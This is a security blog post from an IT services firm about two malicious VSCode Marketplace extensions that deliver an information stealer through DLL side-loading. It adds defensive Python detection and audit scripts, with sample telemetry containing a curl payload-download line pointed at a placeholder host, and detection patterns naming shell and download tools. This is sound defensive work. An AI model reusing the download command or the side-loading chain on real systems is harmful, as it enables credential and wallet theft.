Malicious VSCode Extensions Infiltrate Microsoft’s Registry with Information-Stealing Malware



The cybersecurity landscape for software developers took a dangerous turn this week as security researchers uncovered two malicious extensions lurking within Microsoft’s Visual Studio Code Marketplace. These sophisticated threats, masquerading as legitimate productivity tools, are designed to infiltrate developers’ workstations and exfiltrate sensitive information ranging from credentials and cryptocurrency wallets to browser sessions and system data.

The Growing Threat to Development Environments

Visual Studio Code (VSCode) has become one of the most popular integrated development environments (IDEs) among software developers worldwide. Its extensibility through the VSCode Marketplace allows developers to customize their workflow with thousands of extensions. However, this same extensibility has become an attack vector that cybercriminals are increasingly exploiting to target the developer community.

The discovery of these malicious extensions highlights a critical vulnerability in the software supply chain—when the tools developers use to build applications become compromised, the ramifications extend far beyond individual machines to potentially affect entire software ecosystems and the organizations that depend on them.

Identifying the Malicious Extensions: Bitcoin Black and Codo AI

Security researchers at Koi Security identified two particularly insidious extensions published under the developer name ‘BigBlack’ on Microsoft’s official VSCode Marketplace. The extensions, named Bitcoin Black and Codo AI, employed social engineering tactics to appear legitimate while harboring dangerous payload delivery mechanisms.

Bitcoin Black presented itself as a simple color theme for VSCode, while Codo AI masqueraded as an AI-powered coding assistant—tools that developers commonly seek to enhance their productivity and customize their development environment. At the time of discovery, Codo AI remained available in the marketplace with fewer than 30 downloads, while Bitcoin Black’s counter showed only one installation.

The relatively low download counts suggest these threats were either recently deployed or part of a targeted campaign rather than a widespread attack. Nevertheless, even limited infections in development environments can have cascading consequences, particularly if compromised developers work on software that reaches end users or enterprise systems.

How the Malicious Extensions Operate

Initial Infection Vector

The Bitcoin Black extension utilized a particularly concerning activation mechanism—a universal activation event denoted by an asterisk (*) that triggers execution on every VSCode action. This means the malicious code would run continuously during normal development activities, providing persistent access to the compromised system without requiring specific user actions beyond the initial installation.

Additionally, Bitcoin Black included the capability to execute PowerShell code, a functionality that serves no legitimate purpose for a color theme extension and should have raised immediate red flags during any security review process. This capability allowed the extension to serve as a gateway for downloading and executing additional malicious payloads.

Evolution of the Attack Methodology

Earlier versions of the Bitcoin Black extension employed a PowerShell script to download a password-protected archived payload. However, this approach had a significant weakness from an attacker’s perspective—it created a visible PowerShell window that could alert suspicious users to unauthorized activity.

The threat actors behind these extensions quickly adapted their tactics. More recent versions switched to a batch script (bat.sh) that leverages the curl command to download both a DLL file and an executable. Critically, this updated approach executes with the window hidden, eliminating the visual indicator that might have warned users of malicious activity occurring in the background.

The Codo AI Deception

The Codo AI extension represented a more sophisticated approach to social engineering. According to security researcher Idan Dardikman of Koi Security, the extension actually includes functional code assistance capabilities that integrate with ChatGPT or DeepSeek—popular AI coding assistants. This legitimate functionality serves as camouflage for the malicious components embedded within the extension, making it harder for users to identify the threat based on observed behavior alone.

Technical Analysis of the Information Stealer

DLL Hijacking Technique

Both malicious extensions deliver their ultimate payload through a technique known as DLL hijacking. This attack method exploits the way Windows applications load Dynamic Link Library (DLL) files by placing a malicious DLL in a location where a legitimate application will load it instead of the intended library.

In this campaign, the attackers bundle a legitimate executable of Lightshot, a popular screenshot tool, alongside a malicious DLL file. When the Lightshot executable runs, it loads the malicious DLL, which then deploys the actual information-stealing malware under the process name runtime.exe. This technique provides stealth and legitimacy to the malicious process, as it appears to be associated with a known, trusted application.

The malicious DLL demonstrates concerning detection rates on virus scanning platforms. Analysis through VirusTotal revealed that 29 out of 72 antivirus engines flagged the DLL as malicious—significant, but far from universal detection. This partial detection rate means that many security solutions would fail to identify the threat, allowing it to operate undetected on protected systems.

Data Exfiltration Capabilities

Once successfully deployed, the information stealer creates a sophisticated infrastructure for collecting and organizing stolen data. The malware establishes a directory within the Windows AppData folder (%APPDATA%\Local) and creates a subdirectory named “Evelyn” specifically for storing exfiltrated information.

The range of data targeted by this malware is comprehensive and reflects a deep understanding of what information holds value on developer workstations:

System Intelligence: The malware collects detailed information about running processes, installed programs, and system specifications. This intelligence helps attackers understand the victim’s environment and identify high-value targets or opportunities for further exploitation.

Credential Harvesting: The stealer actively searches for stored passwords and credentials across various applications and services. For developers, these credentials often provide access to code repositories, cloud services, and production environments—making them extraordinarily valuable to threat actors.

Network Information: WiFi credentials stored on the system are exfiltrated, potentially providing attackers with information to conduct further attacks against the victim’s network infrastructure or impersonate the victim on trusted networks.

Clipboard Monitoring: By capturing clipboard content, the malware can intercept passwords, cryptocurrency addresses, authentication codes, and other sensitive data that users copy and paste during normal work activities.

Screenshot Capability: The malware can capture screenshots of the victim’s desktop, potentially revealing sensitive information displayed in applications, code being developed, or confidential communications.

Browser Session Hijacking

One of the most sophisticated and dangerous capabilities of this information stealer is its approach to stealing browser data. Modern browsers increasingly protect against simple extraction of cookies from on-disk storage, so rather than reading saved cookies directly from browser storage, the malware takes a more aggressive tactic.

Headless Browser Exploitation

The stealer launches both Google Chrome and Microsoft Edge browsers in headless mode. Headless browsing runs the browser without a visible user interface. This allows the malware to control the browser programmatically while remaining invisible to the user.

This technique enables the malware to extract stored cookies while they are actively loaded in memory, sidestepping many of the protections that guard cookies at rest.

Session Hijacking Consequences

With stolen session cookies, attackers can hijack authenticated user sessions without needing to know passwords or bypass multi-factor authentication. For developers, this could provide unauthorized access to code repositories, cloud infrastructure management consoles, SaaS applications, and any other services where active sessions exist.

Cryptocurrency Wallet Targeting

The malware specifically targets popular cryptocurrency wallets, including Phantom, Metamask, and Exodus. As cryptocurrency adoption has grown among technology professionals and developers, these wallets have become common targets for cybercriminals.

Cryptocurrency wallets often contain not just digital assets but also private keys and seed phrases that provide complete control over funds. Unlike traditional financial accounts, cryptocurrency transactions are irreversible, and there’s no central authority to appeal to for recovery of stolen funds. This makes cryptocurrency wallets particularly lucrative targets for information stealers.

The Broader Context of VSCode Extension Threats

The Glassworm Campaign and Historical Precedent

The Bitcoin Black and Codo AI extensions are not isolated incidents but part of a growing pattern of attacks targeting VSCode extension platforms. One of the most notable previous campaigns, dubbed Glassworm, demonstrated the potential scale and sophistication of attacks against developer tool ecosystems.

Malicious extensions have appeared not only on Microsoft’s official VSCode Marketplace but also on alternative platforms like OpenVSX, which provides extensions for VSCode-compatible IDEs. This multi-platform presence indicates that threat actors view the VSCode ecosystem as a valuable attack surface worth sustained investment and effort.

Why Developers Make Attractive Targets

Developers represent high-value targets for several compelling reasons that make them disproportionately attractive to cybercriminals:

Access to Source Code: Compromising a developer’s workstation can provide access to proprietary source code, intellectual property, and trade secrets. For competitors or nation-state actors engaged in economic espionage, this access is invaluable.

Supply Chain Position: Developers sit at a critical point in the software supply chain. Code they write and systems they access can affect thousands or millions of downstream users. Compromising a developer can enable supply chain attacks with massive reach.

Elevated Privileges: Developers typically require extensive system permissions and access to production environments, databases, and cloud infrastructure. A compromised developer account can provide attackers with privileged access throughout an organization’s technology stack.

Cryptocurrency Holdings: The technology community has higher-than-average cryptocurrency adoption rates, making developers more likely to have valuable digital assets stored on their workstations.

Valuable Credentials: Developers maintain access to numerous high-value systems including code repositories (GitHub, GitLab, Bitbucket), cloud platforms (AWS, Azure, GCP), container registries, API keys, and deployment systems.

Microsoft’s Marketplace Security Challenges

The presence of malicious extensions on Microsoft’s official marketplace raises important questions about the vetting and security review processes for submitted extensions. While Microsoft maintains some level of review for marketplace submissions, the approval of these clearly malicious extensions suggests gaps in the security validation process.

Several factors make marketplace security particularly challenging:

Volume of Submissions: Popular extension marketplaces receive numerous submissions daily, making comprehensive manual review of every extension impractical without significant resource investment.

Sophisticated Obfuscation: Attackers increasingly employ sophisticated code obfuscation techniques and delayed payload delivery to evade automated scanning tools and cursory code reviews.

Legitimate Functionality Camouflage: As demonstrated by Codo AI, malicious extensions can include genuine, useful functionality that obscures malicious components and makes behavioral analysis more difficult.

Evolution After Approval: Extensions can be updated after initial approval, potentially allowing attackers to publish a benign initial version and subsequently update it with malicious functionality.

Security Best Practices for VSCode Users

Vetting Extension Publishers

When installing VSCode extensions, developers should implement a careful evaluation process:

Publisher Reputation: Install extensions only from well-established publishers with a track record of legitimate contributions to the developer community. Check the publisher’s profile for other extensions they’ve published and look for evidence of sustained, professional development activity.

Download Metrics: While not foolproof, extension download counts can provide useful signals. Extensions with very low download counts from unknown publishers warrant extra scrutiny, particularly if they claim to provide functionality similar to popular existing extensions.

Review History: Examine user reviews and ratings, paying particular attention to recent reviews that might indicate newly introduced issues or suspicious behavior. Be skeptical of extensions with overwhelmingly positive reviews from accounts with limited history, as these can be fabricated.

Last Updated Date: Extensions that haven’t been updated in extended periods may contain security vulnerabilities or be abandoned by their developers. Conversely, be cautious of brand-new extensions from unknown publishers, especially if they request extensive permissions.

Understanding Extension Permissions

VSCode extensions declare the permissions and capabilities they require. Before installing an extension, developers should:

Review Activation Events: Be immediately suspicious of extensions using universal activation events (*) unless there’s a clear, legitimate reason for the extension to run continuously. Most extensions should only activate for specific file types, commands, or workspace conditions.

Evaluate Required Capabilities: Consider whether the permissions requested align with the extension’s stated functionality. A color theme should never require the ability to execute shell commands or access the file system extensively.

Examine Marketplace Listings: Read the extension description thoroughly and look for vague functionality claims, poor documentation, or unprofessional presentation—all potential red flags for malicious or low-quality extensions.

Organizational Security Measures

For organizations employing software developers, additional protective measures should be implemented:

Extension Allowlists: Consider implementing organizational policies that restrict extension installation to a curated allowlist of approved extensions that have undergone security review.

Developer Workstation Segmentation: Implement network segmentation and access controls that limit the potential damage if a developer workstation becomes compromised. Developers shouldn’t have unrestricted access to production environments directly from their development machines.

Endpoint Detection and Response: Deploy EDR solutions that can detect suspicious behavior patterns associated with information stealers, such as headless browser execution, unusual data staging activities, or unauthorized credential access.

Regular Security Awareness Training: Educate development teams about the risks associated with development tool compromise and the importance of following extension vetting procedures.
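Detection logic for the behaviours listed under Endpoint Detection and Response, run over constructed Sysmon-style process, image-load and file events that mirror the chain described in this article (a batch script launched from an extension folder, curl fetching a DLL, Lightshot side-loading it, runtime.exe, headless Chrome, writes to the Evelyn folder). This is an added example, not the article's or any EDR vendor's rules; the paths, the .invalid URL and the extension folder name are constructed placeholders.

```python
"""Behavioural rules for the VSCode-extension stealer chain (added example)."""
import ntpath
import re

BROWSERS = {"chrome.exe", "msedge.exe"}
DOWNLOADERS = {"curl.exe", "powershell.exe", "pwsh.exe"}
# A URL whose path ends in .dll or .exe, i.e. a direct binary download.
PAYLOAD_URL = re.compile(r"https?://\S+\.(?:dll|exe)\b", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path or "").lower()


def detect(events):
    """Return (rule_name, event_index) for every event matching a rule."""
    alerts = []
    for i, ev in enumerate(events):
        kind = ev.get("EventType")
        image = _base(ev.get("Image"))
        parent = _base(ev.get("ParentImage"))
        cmd = (ev.get("CommandLine") or "").lower()
        if kind == "ProcessCreate":
            # cmd.exe started by VSCode to run a script stored inside an extension folder.
            if image == "cmd.exe" and parent == "code.exe" and "\\.vscode\\extensions\\" in cmd:
                alerts.append(("script_run_from_extension_dir", i))
            # curl / PowerShell under a batch script pulling a DLL or EXE from the network.
            if image in DOWNLOADERS and parent == "cmd.exe" and PAYLOAD_URL.search(cmd):
                alerts.append(("payload_download_via_batch", i))
            # The stealer process named runtime.exe, spawned by Lightshot or living in AppData.
            if image == "runtime.exe" and (
                parent == "lightshot.exe" or "\\appdata\\" in (ev.get("Image") or "").lower()
            ):
                alerts.append(("runtime_exe_from_sideloaded_host", i))
            # A browser launched headless by something that is not itself a browser.
            if image in BROWSERS and "--headless" in cmd and parent not in BROWSERS:
                alerts.append(("headless_browser_from_non_browser", i))
        elif kind == "ImageLoad":
            # Lightshot loading an unsigned DLL from its own directory: the hijack itself.
            loaded = ev.get("ImageLoaded") or ""
            same_dir = ntpath.dirname(loaded).lower() == ntpath.dirname(ev.get("Image") or "").lower()
            unsigned = str(ev.get("Signed", "")).lower() != "true"
            if image == "lightshot.exe" and loaded.lower().endswith(".dll") and same_dir and unsigned:
                alerts.append(("dll_sideload_lightshot", i))
        elif kind == "FileCreate":
            # Data staged into the Evelyn folder the write-up describes.
            if "\\appdata\\local\\evelyn\\" in (ev.get("TargetFilename") or "").lower():
                alerts.append(("evelyn_staging_folder", i))
    return alerts


# Constructed telemetry: the malicious chain followed by two benign look-alikes.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\dev\.vscode\extensions\bigblack.bitcoin-black-1.0.0\bat.sh"'},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -s -o lightshot.dll https://PLACEHOLDER.invalid/payload.dll"},
    {"EventType": "ImageLoad", "Image": r"C:\Users\dev\AppData\Local\Temp\Lightshot.exe",
     "ImageLoaded": r"C:\Users\dev\AppData\Local\Temp\lightshot.dll", "Signed": "false"},
    {"EventType": "ProcessCreate", "Image": r"C:\Users\dev\AppData\Local\Temp\runtime.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Temp\Lightshot.exe", "CommandLine": "runtime.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Temp\runtime.exe",
     "CommandLine": "chrome.exe --headless"},
    {"EventType": "FileCreate", "Image": r"C:\Users\dev\AppData\Local\Temp\runtime.exe",
     "TargetFilename": r"C:\Users\dev\AppData\Local\Evelyn\system.txt"},
    # Benign: Chrome spawning its own headless helper, and curl fetching a text file.
    {"EventType": "ProcessCreate", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --headless --type=renderer"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -O https://example.com/release-notes.txt"},
]

if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```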

The Evolving Threat Landscape

The sophistication of these malicious VSCode extensions reflects broader trends in the cybersecurity threat landscape:

Developer-Focused Attacks: Threat actors increasingly recognize the value of targeting developers and the software development lifecycle rather than focusing exclusively on end-user systems or servers.

Supply Chain Exploitation: Compromising development tools and environments provides opportunities for supply chain attacks that can affect vast numbers of downstream users.

Living-off-the-Land Techniques: By leveraging legitimate tools like Lightshot and hijacking their functionality, attackers reduce their forensic footprint and evade security tools looking for obviously malicious executables.

Multi-Stage Payload Delivery: The evolution from visible PowerShell windows to hidden batch script execution demonstrates how attackers continuously refine their techniques based on what defensive measures they encounter.

Frequently Asked Questions

How can I check if I’ve installed the malicious Bitcoin Black or Codo AI extensions?

Open VSCode and navigate to the Extensions view (Ctrl+Shift+X or Cmd+Shift+X on Mac). Search for “Bitcoin Black” and “Codo AI” in your installed extensions. If you find either extension installed, uninstall them immediately. Run a comprehensive antivirus scan of your system.

Additionally, check your %APPDATA%\Local\ directory for a folder named “Evelyn.” The malware uses this folder to store stolen data. If you discover either extension was installed, immediately change passwords for all critical accounts. Consider your system potentially compromised.
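A local audit that applies the checks from the permissions section above and this FAQ item: it parses each installed extension's package.json, flags the universal activation event, a theme that ships executable code, shell or download primitives in its bundled JavaScript and the publisher and extension names reported by Koi Security, and tests for the "Evelyn" staging folder. This is an added example, not the article's or Koi Security's tooling; the sample manifests, sources and extension folder names are constructed.

```python
"""Audit installed VSCode extensions for the warning signs in this article (added example)."""
import json
import os
import re
import tempfile
from pathlib import Path

# Indicators named in the write-up: the publisher and the two extension names.
KNOWN_BAD_PUBLISHERS = {"bigblack"}
KNOWN_BAD_NAMES = {"bitcoin black", "codo ai"}
# Primitives a colour theme has no reason to reference: process spawning,
# PowerShell, curl (the reported download path) and cmd.exe.
SHELL_PATTERN = re.compile(r"child_process|\bpowershell\b|\bcurl\b|cmd\.exe", re.IGNORECASE)


def audit_manifest(manifest, source_text=""):
    """Findings for one extension: its parsed package.json plus the text of
    its bundled JavaScript (empty string if the extension ships no code)."""
    findings = []
    publisher = str(manifest.get("publisher", "")).lower()
    display = str(manifest.get("displayName") or manifest.get("name", "")).lower()
    if publisher in KNOWN_BAD_PUBLISHERS:
        findings.append(f"publisher '{manifest.get('publisher')}' is a known malicious publisher")
    if display in KNOWN_BAD_NAMES:
        findings.append(f"'{display}' matches a known malicious extension name")
    if "*" in (manifest.get("activationEvents") or []):
        findings.append("universal activation event '*': extension code runs unconditionally")
    contributes = manifest.get("contributes") or {}
    theme_only = bool(contributes) and set(contributes) <= {"themes", "iconThemes"}
    if theme_only and ("main" in manifest or "browser" in manifest):
        findings.append("theme-only extension declares an executable entry point")
    hits = sorted({m.group(0).lower() for m in SHELL_PATTERN.finditer(source_text)})
    if hits:
        findings.append("source references shell/download primitives: " + ", ".join(hits))
    return findings


def audit_extensions_dir(root):
    """Audit every <root>/<extension>/package.json, e.g. root=~/.vscode/extensions."""
    results = {}
    for manifest_path in sorted(Path(root).glob("*/package.json")):
        folder = manifest_path.parent.name
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            results[folder] = ["unreadable package.json"]
            continue
        source = ""
        for js in manifest_path.parent.rglob("*.js"):
            if "node_modules" not in js.parts:  # skip vendored dependencies
                source += js.read_text(encoding="utf-8", errors="replace")
        findings = audit_manifest(manifest, source)
        if findings:
            results[folder] = findings
    return results


def staging_folder_present(local_appdata):
    """The stealer stages stolen data in a folder named 'Evelyn' under local AppData."""
    return (Path(local_appdata) / "Evelyn").is_dir()


# Constructed manifests: one with the traits reported for Bitcoin Black
# (theme + unconditional activation + JS entry point) and one benign theme.
SUSPICIOUS_MANIFEST = {
    "name": "bitcoin-black", "displayName": "Bitcoin Black", "publisher": "BigBlack",
    "activationEvents": ["*"], "main": "./extension.js",
    "contributes": {"themes": [{"label": "Bitcoin Black", "path": "./theme.json"}]},
}
SUSPICIOUS_SOURCE = 'const cp = require("child_process");\ncp.exec("powershell");\n'
BENIGN_MANIFEST = {
    "name": "plain-theme", "displayName": "Plain Theme", "publisher": "example-dev",
    "contributes": {"themes": [{"label": "Plain", "path": "./theme.json"}]},
}


def run_demo():
    """Build a throwaway extensions folder from the constructed samples and audit it."""
    root = Path(tempfile.mkdtemp())
    # Folder names follow VSCode's publisher.name-version layout (constructed).
    for folder, manifest, src in (
        ("bigblack.bitcoin-black-1.0.0", SUSPICIOUS_MANIFEST, SUSPICIOUS_SOURCE),
        ("example-dev.plain-theme-0.1.0", BENIGN_MANIFEST, None),
    ):
        (root / folder).mkdir()
        (root / folder / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
        if src is not None:
            (root / folder / "extension.js").write_text(src, encoding="utf-8")
    return audit_extensions_dir(root)


if __name__ == "__main__":
    for folder, findings in run_demo().items():
        print(folder)
        for item in findings:
            print("  -", item)
    local_appdata = os.environ.get("LOCALAPPDATA", Path.home() / "AppData" / "Local")
    print("Evelyn staging folder present:", staging_folder_present(local_appdata))
```

To audit a real machine, call `audit_extensions_dir` on `~/.vscode/extensions`; any folder it returns deserves a manual look before the extension is trusted.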

What should I do if I’ve already installed one of these malicious extensions?

If you’ve installed either Bitcoin Black or Codo AI, take immediate action. First, completely disconnect your computer from the internet. This prevents further data exfiltration. Uninstall the malicious extension through VSCode’s extension manager.

Run a full system scan with updated antivirus software. Preferably use multiple scanning tools for comprehensive detection. Change all passwords from a different, known-clean device. Prioritize accounts with access to sensitive systems, code repositories, and financial accounts.

Enable multi-factor authentication on all critical accounts. Consider that your cryptocurrency wallets may be compromised. Take appropriate action to secure any digital assets. Finally, contact your organization’s IT security team if this occurred on a work device. The compromise may have implications for corporate systems and data.

Are malicious extensions common on the VSCode Marketplace?

While Microsoft maintains security measures for the VSCode Marketplace, malicious extensions do occasionally appear. Campaigns like Glassworm and the recently discovered Bitcoin Black and Codo AI threats demonstrate this. However, given the thousands of legitimate extensions available and the millions of installations, malicious extensions represent a small minority.

The risk increases when installing extensions from unknown publishers with limited track records or suspiciously low download counts. Microsoft actively removes malicious extensions when discovered. However, users should not rely solely on marketplace security. They should implement their own vetting procedures before installing any extension.

What permissions should raise red flags when installing a VSCode extension?

Several permission requests should prompt careful evaluation before installation. Universal activation events (denoted by “*”) mean the extension will run on every VSCode action. Legitimate extensions rarely need this capability.

The ability to execute shell commands or PowerShell scripts is unnecessary for most extensions. This is particularly true for those claiming to be themes or simple utilities. Broad file system access beyond what’s clearly required for the extension’s stated functionality warrants scrutiny.

Network access permissions should align with the extension’s purpose. An offline color theme shouldn’t need internet connectivity, for example. Finally, be cautious of extensions requesting access to execute binary files or modify system settings. These capabilities can facilitate malware deployment.

How effective is antivirus software at detecting these threats?

Detection rates for the malicious DLL used in these extensions showed that approximately 40% of antivirus engines (29 out of 72 tested) successfully identified the threat. This partial detection rate is common for newly deployed malware. Such threats haven’t yet been widely analyzed and added to antivirus signature databases.

This underscores an important reality: antivirus software provides valuable protection but should not be considered a complete security solution. Organizations and individual developers should implement defense-in-depth strategies. These should include not only antivirus software but also application allowlisting, behavior-based detection through EDR solutions, network monitoring, and—critically—user education and awareness about threats targeting development environments.

Can these malicious extensions steal data from containers or virtual machines running on my system?

The primary target of these information stealers is the host operating system where VSCode runs. However, depending on how containers and virtual machines are configured, there could be a risk of data exposure.

If you share file systems between your host and containers/VMs, or if you’ve configured network bridges that allow unrestricted communication, the malware could potentially access exposed resources. Additionally, if you copy and paste credentials or other sensitive data between your host system and virtualized environments, the clipboard monitoring functionality could capture that information.

The screenshot capability could also capture whatever is visible on your display. This includes terminal windows showing virtual machine or container operations. For maximum security isolation, avoid sharing credentials between host and virtualized environments. Use separate credential management systems and implement proper network segmentation.

What makes developer tools particularly attractive targets for cybercriminals?

Developer tools represent high-value targets because they operate at a privileged position within organizational security boundaries. Developers typically have access to source code repositories containing proprietary intellectual property and trade secrets. They maintain credentials for production systems, cloud platforms, and critical infrastructure.

Because development work requires flexibility and broad access, developers often operate with fewer restrictions than other users. Compromising a developer’s workstation can enable supply chain attacks. Malicious code can be introduced into software that will be distributed to thousands or millions of end users.

Additionally, the developer community has higher-than-average cryptocurrency adoption. This makes them lucrative targets for financial theft. The technical sophistication of developers sometimes creates a false sense of security. They may be less likely to suspect that tools specifically designed for developers could be malicious.

How can organizations protect their development teams from these threats?

Organizations should implement a multi-layered security approach for development environments. Establish and enforce policies requiring extensions to be installed only from a curated allowlist of pre-approved, vetted extensions.

Implement endpoint detection and response (EDR) solutions capable of identifying suspicious behaviors, such as headless browser execution or unusual data staging activities. Segment development networks from production environments and implement least-privilege access controls.

Require multi-factor authentication for all systems developers can access. This is particularly important for code repositories and cloud infrastructure. Conduct regular security awareness training focused on threats specific to development environments.

Consider implementing application allowlisting to prevent unauthorized executables from running. Deploy Data Loss Prevention (DLP) solutions to monitor and control sensitive data movement. Finally, establish incident response procedures specifically addressing scenarios where developer workstations or development tools become compromised.

How Technijian Can Help

The discovery of malicious extensions in Microsoft’s VSCode Marketplace highlights the sophisticated and evolving threats targeting software development environments. As cybercriminals increasingly recognize the value of compromising developers and their tools, organizations need comprehensive security strategies specifically designed to protect development teams and the software supply chain.

Comprehensive Security Assessments for Development Environments: Technijian’s cybersecurity experts conduct thorough evaluations of your development infrastructure, identifying vulnerabilities in your IDE configurations, extension management practices, and developer workstation security posture. We assess your current security controls and provide actionable recommendations for strengthening protection against supply chain attacks and developer-targeted threats.

Managed Endpoint Detection and Response: Our managed EDR services provide continuous monitoring of developer workstations with advanced behavioral analytics capable of detecting sophisticated threats like information stealers, even when they employ obfuscation or living-off-the-land techniques. We identify suspicious activities such as headless browser execution, unusual data staging, and unauthorized credential access—the exact behaviors exhibited by malicious extensions like Bitcoin Black and Codo AI.

Security Policy Development and Enforcement: Technijian helps organizations implement practical security policies for development teams, including extension allowlist management, secure coding practices, and access control frameworks. We balance security requirements with developer productivity, creating policies that protect your organization without unnecessarily hindering development workflows.

Incident Response and Forensic Investigation: If your organization has been affected by malicious extensions or suspects developer workstation compromise, Technijian’s incident response team provides rapid investigation and remediation services. We contain the threat, assess the scope of compromise, recover affected systems, and implement measures to prevent recurrence.

Security Awareness Training for Technical Teams: Our specialized training programs educate developers and IT teams about threats specific to development environments, including malicious IDE extensions, supply chain attacks, and social engineering tactics targeting technical professionals. We provide practical guidance on extension vetting, secure development practices, and recognizing sophisticated threats.

Network Segmentation and Access Control Implementation: Technijian designs and implements network architectures that limit the potential impact of compromised developer workstations. We establish appropriate segmentation between development, staging, and production environments, implement privilege management solutions, and configure access controls that follow least-privilege principles.

As threat actors continue refining their attacks against development environments, partnering with experienced cybersecurity professionals becomes essential for protecting your organization’s intellectual property, infrastructure, and reputation. Technijian brings over two decades of managed IT services experience serving businesses throughout Orange County and Southern California, with deep expertise in cybersecurity, threat detection, and incident response.

Contact Technijian today to schedule a comprehensive security assessment of your development environment and discover how our managed cybersecurity services can protect your development teams from sophisticated threats targeting the software supply chain. Don’t wait for a compromise to reveal vulnerabilities—proactive security measures implemented today protect your organization’s most valuable assets tomorrow.

About Technijian

Technijian is a premier Managed IT Services provider in Irvine, specializing in delivering secure, scalable, and innovative AI and technology solutions across Orange County and Southern California. Founded in 2000 by Ravi Jain, what started as a one-man IT shop has evolved into a trusted technology partner with teams of engineers, AI specialists, and cybersecurity professionals both in the U.S. and internationally.

Headquartered in Irvine, we provide comprehensive cybersecurity solutions, IT support, AI implementation services, and cloud services throughout Orange County—from Aliso Viejo, Anaheim, Costa Mesa, and Fountain Valley to Newport Beach, Santa Ana, Tustin, and beyond. Our extensive experience with enterprise security deployments, combined with our deep understanding of local business needs, makes us the ideal partner for organizations seeking to implement security solutions that provide real protection.

We work closely with clients across diverse industries, including healthcare, finance, law, retail, and professional services, to design security strategies that reduce risk, enhance productivity, and maintain the highest protection standards. Our Irvine-based office remains our primary hub, delivering the personalized service and responsive support that businesses across Orange County have relied on for over two decades.

With expertise spanning cybersecurity, managed IT services, AI implementation, consulting, and cloud solutions, Technijian has become the go-to partner for small to medium businesses seeking reliable technology infrastructure and comprehensive security capabilities. Whether you need Cisco Umbrella deployment in Irvine, DNS security implementation in Santa Ana, or phishing prevention consulting in Anaheim, we deliver technology solutions that align with your business goals and security requirements.

Partner with Technijian and experience the difference of a local IT company that combines global security expertise with community-driven service. Our mission is to help businesses across Irvine, Orange County, and Southern California harness the power of advanced cybersecurity to stay protected, efficient, and competitive in today’s threat-filled digital world.


Technijian was founded in November of 2000 by Ravi Jain with the goal of providing technology support for small to midsize companies. As the company grew in size, it also expanded its services to address the growing needs of its loyal client base. From its humble beginnings as a one-man-IT-shop, Technijian now employs teams of support staff and engineers in domestic and international offices. Technijian’s US-based office provides the primary line of communication for customers, ensuring each customer enjoys the personalized service for which Technijian has become known.
